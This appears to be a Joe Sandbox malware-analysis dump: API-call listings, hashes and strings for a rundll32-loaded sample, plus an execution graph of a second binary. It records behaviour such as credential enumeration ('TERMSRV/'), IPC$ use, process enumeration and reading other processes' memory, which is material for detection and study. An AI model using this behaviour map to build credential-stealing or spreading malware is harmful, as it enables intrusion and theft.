                                                                      • Opcode Fuzzy Hash: 938853420387fcb7b0da16c723d8409da99296c76ec85b9f8d0e147c53ae9c45
                                                                      • Instruction Fuzzy Hash: 5FF03C74540209FBEF01ABA0ED0AF9DBBBCEB00315F208A50BE11E10E0D77CEA409B24
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04854E76
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04854E79
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04854F2A
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854F2D
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04854F32
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854F35
Similarity
• API ID: Heap$Process$Free$Alloc
• String ID:
• API String ID: 3689955550-0
• Opcode ID: ae253f1f0879306df35b4bf482783f87d6b477de2946b6da1ef2a8896fe3c344
• Instruction ID: 58cd414253180711f37d331518c7c14c56ee89fd265fd9fdedfb6027da2fee12
• Opcode Fuzzy Hash: ae253f1f0879306df35b4bf482783f87d6b477de2946b6da1ef2a8896fe3c344
• Instruction Fuzzy Hash: F42125316843447AEB219F649C04FAF7FA8EF55715F008958E949DB2A0CA74A849C760
APIs
• GetProcessHeap.KERNEL32(00000008,00000034,74DEF380,00000000,?,?,?,048552FD,?,?,?,?,?,?,?,00000000), ref: 048550B3
• HeapAlloc.KERNEL32(00000000,?,?,?,048552FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 048550BA
• GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,759A5200), ref: 04855148
• HeapFree.KERNEL32(00000000,?,?,?,048552FD,?,?,?,?,?,?,?,00000000,00000000), ref: 0485514F
• GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,759A5200,?,?,?,048552FD,?), ref: 04855158
• HeapFree.KERNEL32(00000000,?,?,?,048552FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0485515F
Similarity
• API ID: Heap$Process$Free$Alloc
• String ID:
• API String ID: 3689955550-0
• Opcode ID: 99a93fb1a6d1342c6135740f0d5075146bd66cd10b20809ec25d4d7ca6765aad
• Instruction ID: 8d488b7208f7095b64ee8147c7670a43acc99e7db94c8eaa61a17ab23a84b402
• Opcode Fuzzy Hash: 99a93fb1a6d1342c6135740f0d5075146bd66cd10b20809ec25d4d7ca6765aad
• Instruction Fuzzy Hash: 3921CF32540349BAFF129F94EC48FAA3BACEF44316F048845FE04AE190C6B5A918CB61
APIs
• GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,048547E5,?,?,00000000,?,?,?,?,?,?), ref: 0485318E
• HeapAlloc.KERNEL32(00000000,?,?,?,048547E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04853195
• rand.MSVCRT ref: 048531AF
• rand.MSVCRT ref: 048531BD
• GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,048547E5,?,?,00000000,?), ref: 048531F4
• HeapFree.KERNEL32(00000000,?,?,?,048547E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 048531FB
Similarity
• API ID: Heap$Processrand$AllocFree
• String ID:
• API String ID: 1335519115-0
• Opcode ID: db496e716a29ff357fb80c43debf675682e6e323427aad1bdac614550e7d3de7
• Instruction ID: 6856d53def8823dfb93ba8905512d61e98fcbd9ec470b887d4b4a3c7159a7d85
• Opcode Fuzzy Hash: db496e716a29ff357fb80c43debf675682e6e323427aad1bdac614550e7d3de7
• Instruction Fuzzy Hash: EB11A532540305BBEB019BA9DC45F9EBFADEF45751F004459FE049B190CBB9A845C771
APIs
  • Part of subcall function 048588D3: PathFindFileNameW.SHLWAPI(04867BC8,75BF73E0,?,048595B2), ref: 048588E3
• wsprintfW.USER32 ref: 04859AAF
• wsprintfW.USER32 ref: 04859B0D
• wsprintfW.USER32 ref: 04859B56
Strings
Similarity
• API ID: wsprintf$FileFindNamePath
• String ID: \"C:\Windows\%s\" #1
• API String ID: 988121887-1875761687
• Opcode ID: 1d423058f1ac74dd9e843566e479c2cc4e9f4e370f80bfbbc5aaa19753a7e1c1
• Instruction ID: 2ad5b969dbd97de21c30bec472de5e484c2c148999bfe763152c011bf8f618cc
• Opcode Fuzzy Hash: 1d423058f1ac74dd9e843566e479c2cc4e9f4e370f80bfbbc5aaa19753a7e1c1
• Instruction Fuzzy Hash: 61518723E24358A5DB20DFD4E805BEFB775FF447A0F10615AEA04EB2A0F2B15940C79A
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04857170,00000000,?,04857AF8), ref: 04856F8E
• GetProcAddress.KERNEL32(00000000), ref: 04856F95
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsWow64Process$kernel32.dll
• API String ID: 1646373207-3024904723
• Opcode ID: e7f76a75859f0ea96c697e1c27e1bea424b7e2fc8139426682f75344e158041a
• Instruction ID: 64b0c3e47281de76c0458c5de8b0216ea9950543f8fad00a3ab07c8e62b0c5bd
• Opcode Fuzzy Hash: e7f76a75859f0ea96c697e1c27e1bea424b7e2fc8139426682f75344e158041a
• Instruction Fuzzy Hash: F7D01271640209BBDB50DB94DD0EE9DB7ADEB14749F508914B907E1140D7BCFB01DB25
APIs
• GetProcessHeap.KERNEL32(00000008,?,74DEF380,759A5200,00000000,?,00000000,00000000,00000000), ref: 04854C14
• HeapAlloc.KERNEL32(00000000), ref: 04854C1B
• rand.MSVCRT ref: 04854CE6
Strings
Similarity
• API ID: Heap$AllocProcessrand
• String ID: 8
• API String ID: 1878709018-4194326291
• Opcode ID: 764f3e5d307d5fdb5ffb72a74adcd696d4e06ad242cb7dc00a3c37880e36ba47
• Instruction ID: e04a02da249c60853f9ad280de3279547a521e1f95bc17c96fc191c2e8b2382e
• Opcode Fuzzy Hash: 764f3e5d307d5fdb5ffb72a74adcd696d4e06ad242cb7dc00a3c37880e36ba47
• Instruction Fuzzy Hash: 29B1F231A042669FCB168F6C84643F97FF1EF06718F2486D9E8C1EB251D635E98AC740
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,048579FC,?,?,?), ref: 0485927B
• memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,048579FC,?,?,?), ref: 04859294
• VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04859303
• VirtualFree.KERNEL32(00000000,?,00004000), ref: 04859323
  • Part of subcall function 04858F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 04858F52
  • Part of subcall function 04858F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,02C371B8), ref: 04858FB0
Similarity
• API ID: Virtual$Protect$AllocFreememcpy
• String ID:
• API String ID: 2644210-0
• Opcode ID: e1e82932d3a52e08df541e57783612f7805ac8cb0767de63d1f5a802ef92d4f5
• Instruction ID: 6b8f7f3ca573a092da31a97a252b72c2ae1c904b66fd77bcc715acf5aa81b6ba
• Opcode Fuzzy Hash: e1e82932d3a52e08df541e57783612f7805ac8cb0767de63d1f5a802ef92d4f5
• Instruction Fuzzy Hash: BC21B5B1600311EBEF209B6DAC44F9BB79CEB45755F041B19FD15E76A0EA78F8408AA0
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 04858571
• Process32FirstW.KERNEL32(00000000,?), ref: 0485858F
• Process32NextW.KERNEL32(00000000,0000022C), ref: 048585E4
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 048585EF
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: c89d6af5aa38a506028fd724feb06b4ab2fdca331e451b0b9d95b100f559e5f7
• Instruction ID: 0af00f406a530d4a0fffb99691fdf697d43decbbc97598d854d6fb112de2eee7
• Opcode Fuzzy Hash: c89d6af5aa38a506028fd724feb06b4ab2fdca331e451b0b9d95b100f559e5f7
• Instruction Fuzzy Hash: 4501BE6150261467DA307B6C5C4CA6F769C9745320F544FD3ED16D20F0E624AA908E52
APIs
• CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 0485770B
• CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 048577C3
Strings
Similarity
• API ID: Cred$EnumerateFree
• String ID: TERMSRV/
• API String ID: 3403564193-3001602198
• Opcode ID: 6341afc8b1a7345c9c31e60c844f441f4260c4e1b57ff8e56bcdffa74a216fb7
• Instruction ID: 5e8f283cfd073a4ed5b1ca61847c33fb02503d7f1c6b907066c683fc1ccff410
• Opcode Fuzzy Hash: 6341afc8b1a7345c9c31e60c844f441f4260c4e1b57ff8e56bcdffa74a216fb7
• Instruction Fuzzy Hash: 8E217E72A00109DFDF14DFA9D8C48AEBBBAFB44314F55CA6AD902E7221D370A985CB50
APIs
Strings
Similarity
• API ID: gethostbynamewsprintf
• String ID: %u.%u.%u.%u
• API String ID: 3411498959-1542503432
• Opcode ID: d8b92f98a024fba06ac6a93a0b4cf5f17ad6551cf5ccb4c1ccdfb77ad6656b1e
• Instruction ID: 3f997d8eba439d3c28d59d772171a9e4052e27580c93bffe9075644adcf60f7f
• Opcode Fuzzy Hash: d8b92f98a024fba06ac6a93a0b4cf5f17ad6551cf5ccb4c1ccdfb77ad6656b1e
• Instruction Fuzzy Hash: EDE09BB12041646F83051B59DC5CC76FFECDF0965270982D5FD89CB172C12DEA10EBA4
APIs
• PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04857EA6,?), ref: 04857E7C
Strings
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: C:\Windows\$cscc.dat
                                                                      • API String ID: 3422762182-1946977352
                                                                      • Opcode ID: b4ef5130a8444130c2a36ecbe1b053b24af8d8e7de3adc2ff866e5dcdb4e9126
                                                                      • Instruction ID: 66f1788dbf6b1993bbd5011b2da4dda2bde380f845eeafb427c354b1dabf9e60
                                                                      • Opcode Fuzzy Hash: b4ef5130a8444130c2a36ecbe1b053b24af8d8e7de3adc2ff866e5dcdb4e9126
                                                                      • Instruction Fuzzy Hash: D1C0127138032427555159956C05956BA9CDB16EA2740C621BE05D2500D5DDE8508AD9
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74D65350,?,74DF0F00), ref: 04856439
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04856446
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485644D
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04856465
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1432973188-0
                                                                      • Opcode ID: e9916163320ce0a6d1d65ab1cf8f3e792232ff0f1f0028fee70975c1427f4fc5
                                                                      • Instruction ID: 19129e8ce5b59b3fba6961b0ebe157e547c30e371ce5a5e6add60342a8bdb28c
                                                                      • Opcode Fuzzy Hash: e9916163320ce0a6d1d65ab1cf8f3e792232ff0f1f0028fee70975c1427f4fc5
                                                                      • Instruction Fuzzy Hash: 71F096B6A04119BFEB006FE49CC4C7F7ABCDB452647104A35FD15E2190D1349D0497B0
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008,00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000), ref: 04856CFC
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04856CFF
                                                                        • Part of subcall function 04856D35: EnterCriticalSection.KERNEL32(00000000,74DEF380,?,04856D1C,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000), ref: 04856D46
                                                                        • Part of subcall function 04856D35: LeaveCriticalSection.KERNEL32(00000000,?,04856D1C,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000), ref: 04856D7F
                                                                        • Part of subcall function 04856D35: Sleep.KERNEL32(00002710,?,04856D1C,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000), ref: 04856D97
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000), ref: 04856D24
                                                                      • HeapFree.KERNEL32(00000000,?,?,04856B24,00000000,00000000,00000000,00000000,?,0485A09A,04856AA8,00000000,00000000,00000000,00000024,04856AA8), ref: 04856D27
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CriticalProcessSection$AllocEnterFreeLeaveSleep
                                                                      • String ID:
                                                                      • API String ID: 2739146912-0
                                                                      • Opcode ID: 7d0d2e163c626e6d095bd21e163e3bb06e4aa11d7560ac1bb2214fef272e9981
                                                                      • Instruction ID: 4bcf3a8d7611f5827936bb8cbc81be005768d8276d867b53f887a17f518f8dc9
                                                                      • Opcode Fuzzy Hash: 7d0d2e163c626e6d095bd21e163e3bb06e4aa11d7560ac1bb2214fef272e9981
                                                                      • Instruction Fuzzy Hash: 14E0C972240309ABEB106EE9AC88F17BB9DEB94355F008925FE04DA150DAB9E8048B61
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000000), ref: 04856851
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856854
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 04856860
                                                                      • HeapFree.KERNEL32(00000000), ref: 04856863
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: ab1f79184490effe8152c470365d0a9ebc0b0cbb90d4b9929186183d28544794
                                                                      • Instruction ID: c23fc3ea6f7b6355f7910223d9e09a78c3afedb27e94d427fbb157684f442eb8
                                                                      • Opcode Fuzzy Hash: ab1f79184490effe8152c470365d0a9ebc0b0cbb90d4b9929186183d28544794
                                                                      • Instruction Fuzzy Hash: 12E0127270035867EA109ED6ACC4F17B79CDB94751F444536EF08DB150D564F8049AB1

                                                                      Execution Graph

                                                                      Execution Coverage:16.6%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:2.3%
                                                                      Total number of Nodes:1066
                                                                      Total number of Limit Nodes:33
7ff73cfc8a3c 3044->3468 3045->3046 3048 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3045->3048 3046->3044 3459 7ff73cfc8ac4 3046->3459 3048->3046 3051 7ff73cfc5d9f 3053 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3051->3053 3053->3056 3054 7ff73cfc8a3c _FF_MSGBANNER 59 API calls 3055 7ff73cfc5d6d 3054->3055 3057 7ff73cfc5d71 3055->3057 3058 7ff73cfc5d8b 3055->3058 3056->3041 3477 7ff73cfc8834 3057->3477 3061 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3058->3061 3059 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3059->3044 3061->3051 3062->3028 3496 7ff73cfc5814 GetModuleHandleW 3063->3496 3067 7ff73cfc5e60 _FF_MSGBANNER 62 API calls 3066->3067 3068 7ff73cfc5bb9 3067->3068 3069 7ff73cfc5c00 _FF_MSGBANNER 62 API calls 3068->3069 3070 7ff73cfc5bc0 3069->3070 3500 7ff73cfc59e4 3070->3500 3103 7ff73cfc5114 EncodePointer 3073->3103 3075 7ff73cfc588b _initp_misc_winsig 3076 7ff73cfc82fc EncodePointer 3075->3076 3076->2947 3078 7ff73cfc7233 3077->3078 3079 7ff73cfc7239 InitializeCriticalSectionAndSpinCount 3078->3079 3080 7ff73cfc53ec 3078->3080 3079->3078 3079->3080 3080->2950 3080->2951 3084 7ff73cfc7545 3081->3084 3083 7ff73cfc5417 3083->2950 3083->2957 3084->3083 3085 7ff73cfc7563 Sleep 3084->3085 3104 7ff73cfc8f3c 3084->3104 3085->3083 3085->3084 3135 7ff73cfc741c 3086->3135 3096 7ff73cfc512f FlsFree 3095->3096 3097 7ff73cfc513c 3095->3097 3096->3097 3098 7ff73cfc72c4 DeleteCriticalSection 3097->3098 3099 7ff73cfc72e2 3097->3099 3100 7ff73cfc7460 _freefls 62 API calls 3098->3100 3101 7ff73cfc444c 3099->3101 3102 7ff73cfc72f7 DeleteCriticalSection 3099->3102 3100->3097 3101->2911 3101->2913 3101->2914 3102->3099 3105 7ff73cfc8f51 3104->3105 3107 7ff73cfc8f6e 3104->3107 3106 7ff73cfc8f5f 3105->3106 3105->3107 3112 7ff73cfc5798 3106->3112 3108 7ff73cfc8f86 HeapAlloc 3107->3108 3110 7ff73cfc8f64 3107->3110 3115 7ff73cfc8598 DecodePointer 3107->3115 3108->3107 3108->3110 3110->3084 3117 7ff73cfc5200 GetLastError FlsGetValue 3112->3117 3114 
7ff73cfc57a1 3114->3110 3116 7ff73cfc85b3 3115->3116 3116->3107 3118 7ff73cfc5226 3117->3118 3119 7ff73cfc526e SetLastError 3117->3119 3120 7ff73cfc7520 __onexitinit 57 API calls 3118->3120 3119->3114 3121 7ff73cfc5233 3120->3121 3121->3119 3122 7ff73cfc523b FlsSetValue 3121->3122 3123 7ff73cfc5251 3122->3123 3124 7ff73cfc5267 3122->3124 3125 7ff73cfc5148 _getptd 57 API calls 3123->3125 3129 7ff73cfc7460 3124->3129 3127 7ff73cfc5258 GetCurrentThreadId 3125->3127 3127->3119 3128 7ff73cfc526c 3128->3119 3130 7ff73cfc7465 HeapFree 3129->3130 3134 7ff73cfc7495 realloc 3129->3134 3131 7ff73cfc7480 3130->3131 3130->3134 3132 7ff73cfc5798 _errno 60 API calls 3131->3132 3133 7ff73cfc7485 GetLastError 3132->3133 3133->3134 3134->3128 3136 7ff73cfc743a 3135->3136 3137 7ff73cfc744b EnterCriticalSection 3135->3137 3141 7ff73cfc7334 3136->3141 3140 7ff73cfc5bac _amsg_exit 61 API calls 3140->3137 3142 7ff73cfc7372 3141->3142 3143 7ff73cfc735b 3141->3143 3155 7ff73cfc7387 3142->3155 3166 7ff73cfc74a0 3142->3166 3144 7ff73cfc5e60 _FF_MSGBANNER 60 API calls 3143->3144 3145 7ff73cfc7360 3144->3145 3147 7ff73cfc5c00 _FF_MSGBANNER 60 API calls 3145->3147 3149 7ff73cfc7368 3147->3149 3152 7ff73cfc5850 malloc 3 API calls 3149->3152 3150 7ff73cfc739d 3153 7ff73cfc5798 _errno 60 API calls 3150->3153 3151 7ff73cfc73ac 3154 7ff73cfc741c _lock 60 API calls 3151->3154 3152->3142 3153->3155 3156 7ff73cfc73b6 3154->3156 3155->3137 3155->3140 3157 7ff73cfc73c2 InitializeCriticalSectionAndSpinCount 3156->3157 3158 7ff73cfc73ef 3156->3158 3159 7ff73cfc73d1 3157->3159 3160 7ff73cfc73de LeaveCriticalSection 3157->3160 3161 7ff73cfc7460 _freefls 60 API calls 3158->3161 3162 7ff73cfc7460 _freefls 60 API calls 3159->3162 3160->3155 3161->3160 3164 7ff73cfc73d9 3162->3164 3165 7ff73cfc5798 _errno 60 API calls 3164->3165 3165->3160 3167 7ff73cfc74c8 3166->3167 3169 7ff73cfc7395 3167->3169 3170 7ff73cfc74dc Sleep 3167->3170 3171 7ff73cfc8cd4 3167->3171 3169->3150 3169->3151 3170->3167 3170->3169 3172 
7ff73cfc8d68 3171->3172 3179 7ff73cfc8cec 3171->3179 3173 7ff73cfc8598 _callnewh DecodePointer 3172->3173 3174 7ff73cfc8d6d 3173->3174 3176 7ff73cfc5798 _errno 61 API calls 3174->3176 3175 7ff73cfc8d24 HeapAlloc 3177 7ff73cfc8d5d 3175->3177 3175->3179 3176->3177 3177->3167 3178 7ff73cfc5e60 _FF_MSGBANNER 61 API calls 3178->3179 3179->3175 3179->3178 3180 7ff73cfc8d4d 3179->3180 3181 7ff73cfc5c00 _FF_MSGBANNER 61 API calls 3179->3181 3182 7ff73cfc8598 _callnewh DecodePointer 3179->3182 3184 7ff73cfc8d52 3179->3184 3185 7ff73cfc5850 malloc 3 API calls 3179->3185 3183 7ff73cfc5798 _errno 61 API calls 3180->3183 3181->3179 3182->3179 3183->3184 3186 7ff73cfc5798 _errno 61 API calls 3184->3186 3185->3179 3186->3177 3188 7ff73cfc8bcb 3187->3188 3189 7ff73cfc8bc1 3187->3189 3190 7ff73cfc5798 _errno 62 API calls 3188->3190 3189->3188 3194 7ff73cfc8be8 3189->3194 3191 7ff73cfc8bd4 3190->3191 3199 7ff73cfc5730 3191->3199 3193 7ff73cfc8be0 3193->2997 3194->3193 3195 7ff73cfc5798 _errno 62 API calls 3194->3195 3195->3191 3209 7ff73cfc5540 3196->3209 3202 7ff73cfc56c0 DecodePointer 3199->3202 3201 7ff73cfc5749 3201->3193 3203 7ff73cfc571f 3202->3203 3204 7ff73cfc56fe 3202->3204 3205 7ff73cfc568c _invalid_parameter_noinfo 16 API calls 3203->3205 3204->3201 3206 7ff73cfc572e 3205->3206 3207 7ff73cfc56c0 _invalid_parameter_noinfo 16 API calls 3206->3207 3208 7ff73cfc5749 3207->3208 3208->3201 3210 7ff73cfc557a __initmbctable _FF_MSGBANNER 3209->3210 3211 7ff73cfc5596 RtlCaptureContext RtlLookupFunctionEntry 3210->3211 3212 7ff73cfc55cf RtlVirtualUnwind 3211->3212 3213 7ff73cfc5606 3211->3213 3214 7ff73cfc5622 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3212->3214 3213->3214 3215 7ff73cfc5654 _FF_MSGBANNER 3214->3215 3218 7ff73cfc71f0 3215->3218 3217 7ff73cfc5673 GetCurrentProcess TerminateProcess 3219 7ff73cfc71f9 3218->3219 3220 7ff73cfc7204 3219->3220 3221 7ff73cfc8df0 RtlCaptureContext RtlLookupFunctionEntry 3219->3221 3220->3217 3222 7ff73cfc8e34 
RtlVirtualUnwind 3221->3222 3223 7ff73cfc8e75 3221->3223 3224 7ff73cfc8e97 IsDebuggerPresent 3222->3224 3223->3224 3229 7ff73cfc7fa4 3224->3229 3226 7ff73cfc8ef6 SetUnhandledExceptionFilter UnhandledExceptionFilter 3227 7ff73cfc8f14 _FF_MSGBANNER 3226->3227 3228 7ff73cfc8f1e GetCurrentProcess TerminateProcess 3226->3228 3227->3228 3228->3217 3229->3226 3231 7ff73cfc874a EncodePointer 3230->3231 3231->3231 3232 7ff73cfc875f 3231->3232 3232->3004 3236 7ff73cfc8610 3233->3236 3249 7ff73cfc5868 3236->3249 3251 7ff73cfc23a0 InitializeSecurityDescriptor 3250->3251 3252 7ff73cfc2449 3250->3252 3251->3252 3253 7ff73cfc23b4 SetSecurityDescriptorDacl 3251->3253 3252->3008 3253->3252 3254 7ff73cfc23cc CreateFileW 3253->3254 3254->3252 3255 7ff73cfc2400 GetModuleHandleW GetProcAddress 3254->3255 3256 7ff73cfc241f 3255->3256 3256->3252 3256->3254 3257 7ff73cfc2426 Sleep 3256->3257 3258 7ff73cfc2433 WaitNamedPipeW 3256->3258 3257->3256 3258->3252 3258->3256 3276 7ff73cfc326c 3259->3276 3261 7ff73cfc3a63 3261->3012 3263 7ff73cfc37f1 3263->3261 3272 7ff73cfc37fc 3263->3272 3265 7ff73cfc3803 GetModuleHandleW GetProcAddress 3265->3272 3266 7ff73cfc1170 11 API calls 3266->3272 3267 7ff73cfc3a5f 3267->3261 3268 7ff73cfc3a4a LocalFree 3268->3272 3269 7ff73cfc224c 13 API calls 3269->3272 3270 7ff73cfc398b GetModuleHandleW GetProcAddress 3270->3272 3271 7ff73cfc39f8 LocalFree 3271->3272 3272->3265 3272->3266 3272->3267 3272->3268 3272->3269 3272->3270 3272->3271 3273 7ff73cfc3a0b LocalFree 3272->3273 3274 7ff73cfc3a1e LocalFree 3272->3274 3275 7ff73cfc3a2d LocalFree 3272->3275 3273->3272 3274->3272 3275->3272 3277 7ff73cfc32d4 3276->3277 3278 7ff73cfc35eb 3276->3278 3320 7ff73cfc2a34 3277->3320 3278->3261 3278->3263 3302 7ff73cfc1170 3278->3302 3280 7ff73cfc3325 RtlInitUnicodeString 3328 7ff73cfc1864 3280->3328 3281 7ff73cfc32f9 CreateFileW 3282 7ff73cfc33ac 3281->3282 3285 7ff73cfc3557 3282->3285 3335 7ff73cfc1000 GetModuleHandleW GetProcAddress 3282->3335 3284 7ff73cfc335e 3284->3285 
3291 7ff73cfc338b LocalFree 3284->3291 3398 7ff73cfc1920 RtlEqualUnicodeString 3284->3398 3285->3278 3286 7ff73cfc35d8 CloseHandle 3285->3286 3288 7ff73cfc35c2 LocalFree 3285->3288 3290 7ff73cfc35cc LocalFree 3285->3290 3292 7ff73cfc358e 3285->3292 3294 7ff73cfc35b4 3285->3294 3295 7ff73cfc35ae UnmapViewOfFile 3285->3295 3286->3278 3288->3290 3290->3286 3291->3285 3293 7ff73cfc339d OpenProcess 3291->3293 3292->3288 3292->3290 3293->3282 3294->3288 3296 7ff73cfc35b9 CloseHandle 3294->3296 3295->3294 3296->3288 3297 7ff73cfc33d7 3297->3285 3348 7ff73cfc196c 3297->3348 3303 7ff73cfc11aa 3302->3303 3312 7ff73cfc12bb 3302->3312 3304 7ff73cfc122a 3303->3304 3305 7ff73cfc11ae 3303->3305 3309 7ff73cfc1232 WriteProcessMemory 3304->3309 3310 7ff73cfc1250 GetModuleHandleW GetProcAddress 3304->3310 3306 7ff73cfc1223 __initmbctable 3305->3306 3307 7ff73cfc11b7 3305->3307 3306->3263 3307->3310 3311 7ff73cfc11c3 3307->3311 3308 7ff73cfc133d ReadProcessMemory 3308->3306 3309->3306 3318 7ff73cfc1277 3310->3318 3314 7ff73cfc11c9 SetFilePointer 3311->3314 3315 7ff73cfc11e7 GetModuleHandleW GetProcAddress 3311->3315 3312->3306 3312->3308 3313 7ff73cfc1322 3312->3313 3316 7ff73cfc12da SetFilePointer 3312->3316 3313->3308 3314->3306 3314->3315 3315->3306 3316->3306 3317 7ff73cfc12f4 GetModuleHandleW GetProcAddress 3316->3317 3317->3313 3318->3306 3319 7ff73cfc12ab LocalFree 3318->3319 3319->3306 3321 7ff73cfc2ad1 3320->3321 3327 7ff73cfc2c3a 3320->3327 3322 7ff73cfc2ade GetModuleHandleW GetProcAddress LoadLibraryExW 3321->3322 3325 7ff73cfc2bea 3321->3325 3323 7ff73cfc2b11 8 API calls 3322->3323 3322->3327 3324 7ff73cfc2be8 3323->3324 3323->3325 3324->3327 3325->3327 3400 7ff73cfc2ce8 3325->3400 3327->3278 3327->3280 3327->3281 3329 7ff73cfc1890 NtQuerySystemInformation 3328->3329 3333 7ff73cfc18a0 3328->3333 3330 7ff73cfc1900 3329->3330 3330->3284 3331 7ff73cfc18a5 GetModuleHandleW GetProcAddress LocalAlloc 3331->3330 3332 7ff73cfc18d4 NtQuerySystemInformation 3331->3332 3332->3333 
